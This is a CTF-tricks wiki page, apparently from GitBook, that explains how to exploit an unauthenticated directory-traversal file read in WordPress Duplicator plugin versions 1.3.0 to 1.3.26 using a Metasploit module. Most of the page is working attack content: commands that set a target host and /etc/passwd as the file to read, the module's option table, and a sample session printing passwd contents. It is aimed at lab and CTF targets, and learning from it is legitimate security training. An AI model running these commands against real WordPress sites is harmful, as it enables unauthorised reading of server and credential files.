> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/web-exploit/initial-access-web-exploit-vulnerability-exploitation.md).

# Vulnerability Exploitation

## WordPress Duplicator Arbitrary File Read

To exploit an arbitrary file read vulnerability in the WordPress Duplicator plugin, you can use the dedicated Metasploit scanner module. This module exploits an unauthenticated arbitrary file read vulnerability in WordPress Duplicator plugin versions 1.3.0 to 1.3.26. The vulnerability allows attackers to read arbitrary files via directory traversal sequences in the `file` parameter of the `installer/build/ajax.php` script.

Load the module, specify your target host, the path to the file you want to read, and run the exploit.

```bash
use scanner/http/wp_duplicator_file_read
set RHOSTS target2.ine.local # Replace with the target IP or hostname
set FILEPATH /etc/passwd      # Specify the file path to read (e.g., /etc/passwd, /flag.txt)
run
```

This module has several configurable options to tailor the scan:

```
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
FILEPATH  /etc/passwd      yes       The file path to read (e.g. /etc/passwd, /flag.txt)
Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                     yes       The target host(s), range CIDR identifiers, or hosts file with syntax 'file:<path>'
RPORT     80               yes       The target port (TCP)
SSL       false            no        Negotiate SSL/TLS for outgoing connections
TARGETURI /                yes       The base path to the WordPress installation
VHOST                      no        HTTP server virtual host
```

A detailed example of using the module in `msfconsole` is shown below, demonstrating how to set the target and file path:

```
msf6 > use auxiliary/scanner/http/wp_duplicator_file_read
msf6 auxiliary(scanner/http/wp_duplicator_file_read) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf6 auxiliary(scanner/http/wp_duplicator_file_read) > set FILEPATH /etc/passwd
FILEPATH => /etc/passwd
msf6 auxiliary(scanner/http/wp_duplicator_file_read) > run

[+] File content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
... (truncated)
```

After executing the module, the content of the specified file should be displayed in the output. This will attempt to read the content of the specified file from the target server using the Duplicator plugin vulnerability.
